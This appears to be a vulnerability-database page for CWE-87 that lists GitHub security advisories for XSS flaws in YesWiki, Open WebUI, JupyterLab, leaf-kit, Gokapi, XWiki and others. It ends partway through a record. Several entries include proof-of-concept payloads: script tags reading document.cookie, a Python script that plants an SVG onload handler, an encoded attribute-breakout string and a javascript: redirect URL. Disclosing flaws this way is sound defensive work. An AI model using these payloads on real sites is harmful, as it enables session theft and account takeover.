CWE-87
AllowedImproper Neutralization of Alternate XSS Syntax
Abstraction: Variant · Status: Draft
The product does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax.
98 vulnerabilities reference this CWE, most recent first.
GHSA-37FQ-47QJ-6J5J
Vulnerability from github – Published: 2026-04-01 00:13 – Updated: 2026-04-10 19:34Summary
A stored and blind XSS vulnerability exists in the form title field. A malicious attacker can inject JavaScript without any authentication via a form title that is saved in the backend database. When any user visits that injected page, the JavaScript payload gets executed.
Type: Stored and Blind Cross-Site Scripting (XSS) Affected Component: form title input field Authentication Required: No (Unauthenticated attack possible) Impact: Arbitrary JavaScript execution in victim’s browser
Details
A Stored XSS vulnerability occurs when an application stores malicious user input (in this case, a script injected via the form title field) in its backend database and renders it later on a page viewed by other users without proper sanitization or encoding.
In this case, the attacker can inject JavaScript payloads in the title field of a form, which the application stores in the database. When any user, such as an admin or another visitor, views the page that displays this title, the malicious script executes in their browser context.
PoC
- Visit
https://yeswiki.net/?BazaR&vue=formulaireorlocalhost/?BazaR&vue=formulaireorhttps://ferme.yeswiki.net/[username]/?BazaR&vue=formulaire - Click on the
+icon to add a record via theDiaryform. - Inject the payload like:
<script>alert(document.cookie)</script>or<script>alert(1)</script>intoName of the eventandDescription - Then save the record by clicking
To validate - The payload will be executed when anyone visits
/?BazaR&vue=consulteralso in the diary record/?wiki=BazaR&vue=consulter&action=recherche&q=&id=2&facette=
The payload is persistant.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "yeswiki/yeswiki"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34598"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T00:13:57Z",
"nvd_published_at": "2026-04-02T18:16:31Z",
"severity": "HIGH"
},
"details": "### Summary\nA stored and blind XSS vulnerability exists in the form title field. A malicious attacker can inject JavaScript without any authentication via a form title that is saved in the backend database. When any user visits that injected page, the JavaScript payload gets executed.\n\nType: Stored and Blind Cross-Site Scripting (XSS)\nAffected Component: form title input field\nAuthentication Required: No (Unauthenticated attack possible)\nImpact: Arbitrary JavaScript execution in victim\u2019s browser\n\n\n### Details\nA Stored XSS vulnerability occurs when an application stores malicious user input (in this case, a script injected via the form title field) in its backend database and renders it later on a page viewed by other users without proper sanitization or encoding.\n\nIn this case, the attacker can inject JavaScript payloads in the title field of a form, which the application stores in the database. When any user, such as an admin or another visitor, views the page that displays this title, the malicious script executes in their browser context.\n\n### PoC\n- Visit `https://yeswiki.net/?BazaR\u0026vue=formulaire` or `localhost/?BazaR\u0026vue=formulaire` or \n `https://ferme.yeswiki.net/[username]/?BazaR\u0026vue=formulaire`\n- Click on the `+` icon to add a record via the `Diary` form.\n- Inject the payload like: `\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` or `\u003cscript\u003ealert(1)\u003c/script\u003e` into `Name of the event` and `Description`\n- Then save the record by clicking `To validate`\n- The payload will be executed when anyone visits `/?BazaR\u0026vue=consulter` also in the diary record \n`/?wiki=BazaR\u0026vue=consulter\u0026action=recherche\u0026q=\u0026id=2\u0026facette=`\n\nThe payload is persistant.",
"id": "GHSA-37fq-47qj-6j5j",
"modified": "2026-04-10T19:34:59Z",
"published": "2026-04-01T00:13:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-37fq-47qj-6j5j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34598"
},
{
"type": "PACKAGE",
"url": "https://github.com/YesWiki/yeswiki"
},
{
"type": "WEB",
"url": "https://github.com/YesWiki/yeswiki/releases/tag/v4.6.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "YesWiki has Persistent Blind XSS at \"/?BazaR\u0026vue=consulter\""
}
GHSA-3856-3VXQ-M6FC
Vulnerability from github – Published: 2026-05-14 20:18 – Updated: 2026-05-19 15:58As part of our research on improving our AI pentest, we have uncovered the following issue in Open WebUI. We've manually verified and tided up the report, but you can also find the original agent finding at the bottom of this report.
Summary
The channel webhook create/update flow accepts arbitrary profile_image_url values, including data:image/svg+xml;base64,... payloads. The profile image endpoint then decodes and serves this SVG as image/svg+xml without sanitization, allowing attacker-controlled script handlers (for example onload) to execute when the profile-image URL is opened in the browser.
Details
The server accepts data:image/svg+xml;base64,... values for profile_image_url when creating or updating a webhook. Later, GET /api/v1/channels/webhooks/{webhook_id}/profile/image detects data:image, base64-decodes it, derives the media type from the header (e.g., image/svg+xml), and returns a StreamingResponse with Content-Disposition: inline and media_type set to image/svg+xml. There is no sanitization or transformation. When this URL is opened in a browser, SVG event handlers such as onload execute in the application origin, resulting in stored XSS.
PoC
- Set up a new instance of Open WebUI and log in as admin
- In the Admin Panel, enable Channels (Beta) and click Save
- Create a low-privilege user in the Users tab
- As the attacker, use the low-privilege user to run the following script:
import base64
import secrets
import requests
BASE_URL = "http://127.0.0.1:14000"
EMAIL = "low@local.test"
PASSWORD = "low"
CHANNEL_NAME_PREFIX = "xsswh-poc"
WEBHOOK_NAME = "xss-webhook-poc"
SVG_CANARY = '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(origin)"></svg>'
if __name__ == "__main__":
s = requests.Session()
s.headers.update({"Content-Type": "application/json"})
r = s.post(
f"{BASE_URL}/api/v1/auths/signin",
json={"email": EMAIL, "password": PASSWORD},
timeout=30,
)
r.raise_for_status()
s.headers["Authorization"] = f"Bearer {r.json()['token']}"
r = s.post(
f"{BASE_URL}/api/v1/channels/create",
json={
"name": f"{CHANNEL_NAME_PREFIX}-{secrets.token_hex(4)}",
"type": "group",
"user_ids": [],
"group_ids": [],
},
timeout=30,
)
r.raise_for_status()
channel_id = r.json()["id"]
payload = "data:image/svg+xml;base64," + base64.b64encode(SVG_CANARY.encode()).decode()
r = s.post(
f"{BASE_URL}/api/v1/channels/{channel_id}/webhooks/create",
json={"name": WEBHOOK_NAME, "profile_image_url": payload},
timeout=30,
)
r.raise_for_status()
webhook_id = r.json()["id"]
print(f"{BASE_URL}/api/v1/channels/webhooks/{webhook_id}/profile/image")
This should print a URL like the following, which when visited (by any user), triggers a JavaScript popup proving XSS:
http://127.0.0.1:14000/api/v1/channels/webhooks/aa7c925f-4584-4274-82bf-33a7e98a3365/profile/image
Impact
Conditions required: The victim must be an authenticated, verified user. Channel feature must be enabled.
Stored XSS enables arbitrary JavaScript execution in the context of the application's origin for any viewer who loads the malicious profile image URL. An attacker can exfiltrate session tokens (localstorage) or API keys stored in the page context, perform unauthorized actions on behalf of the victim via same-origin APIs, alter settings, or pivot to broader account compromise. Because this vector is persisted in the database as part of a webhook's profile image, it remains active until removed.
Original Agent Report
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.9.2"
},
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45314"
],
"database_specific": {
"cwe_ids": [
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-14T20:18:09Z",
"nvd_published_at": "2026-05-15T22:16:54Z",
"severity": "HIGH"
},
"details": "As part of our research on improving our [AI pentest](https://www.aikido.dev/attack/aipentest), we have uncovered the following issue in Open WebUI. We\u0027ve manually verified and tided up the report, but you can also find the original agent finding at the bottom of this report.\n\n### Summary\n\nThe channel webhook create/update flow accepts arbitrary `profile_image_url` values, including `data:image/svg+xml;base64,...` payloads. The profile image endpoint then decodes and serves this SVG as `image/svg+xml` without sanitization, allowing attacker-controlled script handlers (for example onload) to execute when the profile-image URL is opened in the browser.\n\n### Details\n\nThe server accepts `data:image/svg+xml;base64,...` values for `profile_image_url` when creating or updating a webhook. Later, `GET /api/v1/channels/webhooks/{webhook_id}/profile/image` detects `data:image`, base64-decodes it, derives the media type from the header (e.g., `image/svg+xml`), and returns a `StreamingResponse` with `Content-Disposition: inline` and `media_type` set to `image/svg+xml`. There is no sanitization or transformation. When this URL is opened in a browser, SVG event handlers such as onload execute in the application origin, resulting in stored XSS.\n\n### PoC\n\n1. Set up a new instance of Open WebUI and log in as admin\n2. In the Admin Panel, enable *Channels (Beta)* and click Save\n3. Create a low-privilege user in the Users tab\n4. As the attacker, use the low-privilege user to run the following script:\n\n```py\nimport base64\nimport secrets\n\nimport requests\n\nBASE_URL = \"http://127.0.0.1:14000\"\nEMAIL = \"low@local.test\"\nPASSWORD = \"low\"\n\nCHANNEL_NAME_PREFIX = \"xsswh-poc\"\nWEBHOOK_NAME = \"xss-webhook-poc\"\nSVG_CANARY = \u0027\u003csvg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(origin)\"\u003e\u003c/svg\u003e\u0027\n\nif __name__ == \"__main__\":\n s = requests.Session()\n s.headers.update({\"Content-Type\": \"application/json\"})\n\n r = s.post(\n f\"{BASE_URL}/api/v1/auths/signin\",\n json={\"email\": EMAIL, \"password\": PASSWORD},\n timeout=30,\n )\n r.raise_for_status()\n s.headers[\"Authorization\"] = f\"Bearer {r.json()[\u0027token\u0027]}\"\n\n r = s.post(\n f\"{BASE_URL}/api/v1/channels/create\",\n json={\n \"name\": f\"{CHANNEL_NAME_PREFIX}-{secrets.token_hex(4)}\",\n \"type\": \"group\",\n \"user_ids\": [],\n \"group_ids\": [],\n },\n timeout=30,\n )\n r.raise_for_status()\n channel_id = r.json()[\"id\"]\n\n payload = \"data:image/svg+xml;base64,\" + base64.b64encode(SVG_CANARY.encode()).decode()\n r = s.post(\n f\"{BASE_URL}/api/v1/channels/{channel_id}/webhooks/create\",\n json={\"name\": WEBHOOK_NAME, \"profile_image_url\": payload},\n timeout=30,\n )\n r.raise_for_status()\n webhook_id = r.json()[\"id\"]\n\n print(f\"{BASE_URL}/api/v1/channels/webhooks/{webhook_id}/profile/image\")\n```\n\nThis should print a URL like the following, which when visited (by any user), triggers a JavaScript popup proving XSS:\n\nhttp://127.0.0.1:14000/api/v1/channels/webhooks/aa7c925f-4584-4274-82bf-33a7e98a3365/profile/image\n\n\u003cimg width=\"1079\" height=\"222\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ce158ace-d14f-4a73-aeb0-e828aff005df\" /\u003e\n\n### Impact\n\nConditions required: The victim must be an authenticated, verified user. Channel feature must be enabled.\n\nStored XSS enables arbitrary JavaScript execution in the context of the application\u0027s origin for any viewer who loads the malicious profile image URL. An attacker can exfiltrate session tokens (localstorage) or API keys stored in the page context, perform unauthorized actions on behalf of the victim via same-origin APIs, alter settings, or pivot to broader account compromise. Because this vector is persisted in the database as part of a webhook\u0027s profile image, it remains active until removed.\n\n### Original Agent Report\n\n\u003cimg width=\"400\" alt=\"app aikido dev_ai-pentests_projects_116389_assessments_019d67d4-81c8-7dd2-bb9e-0a4a774b2c78_issues_sidebarIssue=20439766 (5)\" src=\"https://github.com/user-attachments/assets/0bfb2c7c-f7c4-49cd-a262-5ed9e1bb10df\" /\u003e",
"id": "GHSA-3856-3vxq-m6fc",
"modified": "2026-05-19T15:58:23Z",
"published": "2026-05-14T20:18:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-3856-3vxq-m6fc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45314"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
},
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Open WebUI has XSS via SVG in /api/v1/channels/webhooks/{webhook_id}/profile/image"
}
GHSA-48RM-H6WJ-8PPR
Vulnerability from github – Published: 2024-05-02 18:30 – Updated: 2024-05-02 18:30The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL attribute of the Button widget in all versions up to, and including, 2.6.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
{
"affected": [],
"aliases": [
"CVE-2024-2750"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-87"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-02T17:15:18Z",
"severity": "MODERATE"
},
"details": "The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL attribute of the Button widget in all versions up to, and including, 2.6.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
"id": "GHSA-48rm-h6wj-8ppr",
"modified": "2024-05-02T18:30:53Z",
"published": "2024-05-02T18:30:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2750"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3072751/exclusive-addons-for-elementor/trunk/elements/button/button.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3011b783-e4b4-45d2-81af-2f8d166a30ac?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-4952-P58Q-6CRX
Vulnerability from github – Published: 2021-08-23 19:40 – Updated: 2024-11-18 16:26Impact
Untrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook.
Patches
Patched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21.
References
OWASP Page on Restricting Form Submissions
For more information
If you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list security@ipython.org.
Credit: Guillaume Jeanne from Google
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "jupyterlab"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.2.21"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "jupyterlab"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0a0"
},
{
"fixed": "2.2.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "jupyterlab"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0a0"
},
{
"fixed": "2.3.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "jupyterlab"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0a0"
},
{
"fixed": "3.0.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "jupyterlab"
},
"ranges": [
{
"events": [
{
"introduced": "3.1.0a0"
},
{
"fixed": "3.1.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "notebook"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.7.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "notebook"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"fixed": "6.4.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-32797"
],
"database_specific": {
"cwe_ids": [
"CWE-75",
"CWE-79",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2021-08-23T16:41:37Z",
"nvd_published_at": "2021-08-09T21:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact\n\nUntrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook.\n\n### Patches\n\nPatched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21.\n\n### References\n\n[OWASP Page on Restricting Form Submissions](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html)\n\n### For more information\n\nIf you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list security@ipython.org.\n\nCredit: Guillaume Jeanne from Google\n",
"id": "GHSA-4952-p58q-6crx",
"modified": "2024-11-18T16:26:15Z",
"published": "2021-08-23T19:40:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/google/security-research/security/advisories/GHSA-c469-p3jp-2vhx"
},
{
"type": "WEB",
"url": "https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-4952-p58q-6crx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32797"
},
{
"type": "WEB",
"url": "https://github.com/jupyterlab/jupyterlab/commit/504825938c0abfa2fb8ff8d529308830a5ae42ed"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/jupyterlab/PYSEC-2021-130.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "JupyterLab: XSS due to lack of sanitization of the action attribute of an html \u003cform\u003e"
}
GHSA-4HFH-FCH3-5Q7P
Vulnerability from github – Published: 2026-02-19 19:40 – Updated: 2026-04-22 16:24Summary
htmlEscaped in leaf-kit will only escape html special characters if the extended grapheme clusters match, which allows bypassing escaping by using an extended grapheme cluster containing both the special html character and some additional characters. In the case of html attributes, this can lead to XSS if there is a leaf variable in the attribute that is user controlled.
Details
Relevant code: https://github.com/vapor/leaf-kit/blob/main/Sources/LeafKit/String%2BHTMLEscape.swift#L14
Strings in Swift are based on extended grapheme clusters. HTML on the other hand is based on unicode characters.
For example if you have the sequence "́ (U+0022 Quotation mark followed by U+0301 Combining Acute Accent). To HTML this is just a quote mark followed by some other random character. To swift this is one extended grapheme cluster that does not equal a quotation mark by itself which is a different extended grapheme cluster.
Thus "\"́".replacingOccurrences(of: "\"", with: """) does not replace the quote mark. This allows you to break out of html attributes.
I believe replacingOccurences takes an optional third parameter that allows you to specify options to make it work on UTF-8 characters instead of grapheme clusters, which would be a good fix for this issue.
I see depending on version, leafkit might use replacing instead of replacingOccurences. I don't know swift that well and couldn't find docs on what replacing does, so I don't know if both versions of the function are affected. The version of swift i was testing on I believe was using replacingOccurences
It seems like replacingOccurences will skip past prefix characters of extended grapheme clusters, which is what would be needed in order to meaningfully bypass esaping of <. Thus i think this is mostly limited to attributes and not general text.
PoC
An example vapor application that is vulnerable might look like
routes.swift
import Vapor
struct Hello: Content {
var msg: String?
}
func routes(_ app: Application) throws {
app.post { req throws in
let Hello = try req.content.decode(Hello.self)
return req.view.render("hello", [
"msg": Hello.msg ?? "Hello World!"
])
}
}
With a hello.leaf that looks like
<div title="#(msg)">Hover to see message</div>
And then you POST something like msg=%22%cc%81=1%20autofocus%20tabindex=0%20onfocus=alert(1)%20
Impact
If a website uses leaf to escape an attribute value based on user input, the attacker may be able to insert a malicious attribute. If a site is not using a secure CSP policy, then this can be used to execute malicious javascript (XSS). Impact is context dependent if a site is using a secure CSP policy.
{
"affected": [
{
"package": {
"ecosystem": "SwiftURL",
"name": "github.com/vapor/leaf-kit"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27120"
],
"database_specific": {
"cwe_ids": [
"CWE-75",
"CWE-79",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-19T19:40:08Z",
"nvd_published_at": "2026-02-20T22:16:29Z",
"severity": "MODERATE"
},
"details": "### Summary\n\n`htmlEscaped` in leaf-kit will only escape html special characters if the extended grapheme clusters match, which allows bypassing escaping by using an extended grapheme cluster containing both the special html character and some additional characters. In the case of html attributes, this can lead to XSS if there is a leaf variable in the attribute that is user controlled.\n\n### Details\n\nRelevant code:\nhttps://github.com/vapor/leaf-kit/blob/main/Sources/LeafKit/String%2BHTMLEscape.swift#L14\n\nStrings in Swift are based on extended grapheme clusters. HTML on the other hand is based on unicode characters. \n\nFor example if you have the sequence \"\u0301 (U+0022 Quotation mark followed by U+0301 Combining Acute Accent). To HTML this is just a quote mark followed by some other random character. To swift this is one extended grapheme cluster that does not equal a quotation mark by itself which is a different extended grapheme cluster.\n\nThus `\"\\\"\u0301\".replacingOccurrences(of: \"\\\"\", with: \"\u0026quot;\")` does not replace the quote mark. This allows you to break out of html attributes.\n\nI believe replacingOccurences takes an optional third parameter that allows you to specify options to make it work on UTF-8 characters instead of grapheme clusters, which would be a good fix for this issue.\n\nI see depending on version, leafkit might use `replacing` instead of `replacingOccurences`. I don\u0027t know swift that well and couldn\u0027t find docs on what replacing does, so I don\u0027t know if both versions of the function are affected. The version of swift i was testing on I believe was using replacingOccurences\n\nIt seems like replacingOccurences will skip past prefix characters of extended grapheme clusters, which is what would be needed in order to meaningfully bypass esaping of \u003c. Thus i think this is mostly limited to attributes and not general text.\n\n### PoC\n\nAn example vapor application that is vulnerable might look like\n\nroutes.swift\n```swift\nimport Vapor\n\nstruct Hello: Content {\n var msg: String?\n}\n\nfunc routes(_ app: Application) throws {\n app.post { req throws in\n\tlet Hello = try req.content.decode(Hello.self)\n return req.view.render(\"hello\", [\n \"msg\": Hello.msg ?? \"Hello World!\"\n ])\n }\n}\n```\n\nWith a hello.leaf that looks like\n```\n\u003cdiv title=\"#(msg)\"\u003eHover to see message\u003c/div\u003e\n```\n\nAnd then you POST something like `msg=%22%cc%81=1%20autofocus%20tabindex=0%20onfocus=alert(1)%20`\n\n### Impact\nIf a website uses leaf to escape an attribute value based on user input, the attacker may be able to insert a malicious attribute. If a site is not using a secure CSP policy, then this can be used to execute malicious javascript (XSS). Impact is context dependent if a site is using a secure CSP policy.",
"id": "GHSA-4hfh-fch3-5q7p",
"modified": "2026-04-22T16:24:14Z",
"published": "2026-02-19T19:40:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vapor/leaf-kit/security/advisories/GHSA-4hfh-fch3-5q7p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27120"
},
{
"type": "WEB",
"url": "https://github.com/vapor/leaf-kit/commit/8919e39476c3a4ba05c28b71546bb9195f87ef34"
},
{
"type": "PACKAGE",
"url": "https://github.com/vapor/leaf-kit"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Leaf-kit html escaping does not work on characters that are part of extended grapheme cluster"
}
GHSA-4XG4-54HM-9J77
Vulnerability from github – Published: 2025-06-03 06:27 – Updated: 2025-08-26 20:10Impact
By renaming the friendly name of an API key, an authenticated user could inject JS into the API key overview, which would also be executed when another user clicks on his API tab. With the affected versions <v2.0, there was no user permission system implemented, therefore all authenticated users were already able to see and modify all resources, even if end-to-end encrypted, as the encryption key had to be the same for all users with <v2.0. Nethertheless with XSS, other attack vectors like redirection or crypto mining would be possble.
Patches
This CVE has been fixed in v2.0.0
Workarounds
If you are the only authenticated user using Gokapi, you are not affected. A workaround would be to not open the API page if you suspect that another user might have injected code.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/forceu/gokapi"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.1"
},
{
"last_affected": "1.9.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/forceu/gokapi"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20250530185940-65ddbc68fbfd"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-48495"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-03T06:27:28Z",
"nvd_published_at": "2025-06-02T12:15:25Z",
"severity": "MODERATE"
},
"details": "### Impact\n\nBy renaming the friendly name of an API key, an authenticated user could inject JS into the API key overview, which would also be executed when another user clicks on his API tab.\nWith the affected versions \u003cv2.0, there was no user permission system implemented, therefore all authenticated users were already able to see and modify all resources, even if end-to-end encrypted, as the encryption key had to be the same for all users with \u003cv2.0. Nethertheless with XSS, other attack vectors like redirection or crypto mining would be possble.\n\n### Patches\n\nThis CVE has been fixed in v2.0.0\n\n### Workarounds\n\nIf you are the only authenticated user using Gokapi, you are not affected. A workaround would be to not open the API page if you suspect that another user might have injected code.",
"id": "GHSA-4xg4-54hm-9j77",
"modified": "2025-08-26T20:10:48Z",
"published": "2025-06-03T06:27:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Forceu/Gokapi/security/advisories/GHSA-4xg4-54hm-9j77"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48495"
},
{
"type": "WEB",
"url": "https://github.com/Forceu/Gokapi/commit/65ddbc68fbfdf1c80cadb477f4bcbb7f2c4fdbf8"
},
{
"type": "PACKAGE",
"url": "https://github.com/Forceu/Gokapi"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3736"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:L",
"type": "CVSS_V4"
}
],
"summary": "Gokapi has stored XSS vulnerability in friendly name for API keys"
}
GHSA-4XM7-5Q79-3FCH
Vulnerability from github – Published: 2023-06-22 20:00 – Updated: 2023-06-22 20:00Impact
Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the DeleteApplication page to perform a XSS, e.g. by using URL such as:
xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)
This vulnerability exists since XWiki 6.2-milestone-1.
Patches
The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.
Workarounds
It's possible to workaround the vulnerability by editing the page AppWithinMinutes.DeleteApplication to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets.
References
- Jira ticket about the vulnerability: https://jira.xwiki.org/browse/XWIKI-20614
- Introduction of the macro used for fixing all those vulnerabilities: https://jira.xwiki.org/browse/XWIKI-20583
- Commit containing the actual fix in the page: https://github.com/xwiki/xwiki-platform/commit/8f5a889b7cd140770e54f5b4195d88058790e305
For more information
If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-appwithinminutes-ui"
},
"ranges": [
{
"events": [
{
"introduced": "6.2-milestone-1"
},
{
"fixed": "14.10.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-appwithinminutes-ui"
},
"ranges": [
{
"events": [
{
"introduced": "15.0-rc-1"
},
{
"fixed": "15.1-rc-1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-35161"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2023-06-22T20:00:00Z",
"nvd_published_at": "2023-06-23T19:15:09Z",
"severity": "CRITICAL"
},
"details": "### Impact\nUsers are able to forge an URL with a payload allowing to inject Javascript in the page (XSS).\nIt\u0027s possible to exploit the DeleteApplication page to perform a XSS, e.g. by using URL such as:\n\n\u003e xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu\u0026resolve=true\u0026xredirect=javascript:alert(document.domain)\n\nThis vulnerability exists since XWiki 6.2-milestone-1.\n\n### Patches\n\nThe vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n\n### Workarounds\n\nIt\u0027s possible to workaround the vulnerability by editing the page AppWithinMinutes.DeleteApplication to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets.\n\n### References\n\n * Jira ticket about the vulnerability: https://jira.xwiki.org/browse/XWIKI-20614\n * Introduction of the macro used for fixing all those vulnerabilities: https://jira.xwiki.org/browse/XWIKI-20583\n * Commit containing the actual fix in the page: https://github.com/xwiki/xwiki-platform/commit/8f5a889b7cd140770e54f5b4195d88058790e305\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n",
"id": "GHSA-4xm7-5q79-3fch",
"modified": "2023-06-22T20:00:00Z",
"published": "2023-06-22T20:00:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-4xm7-5q79-3fch"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35161"
},
{
"type": "WEB",
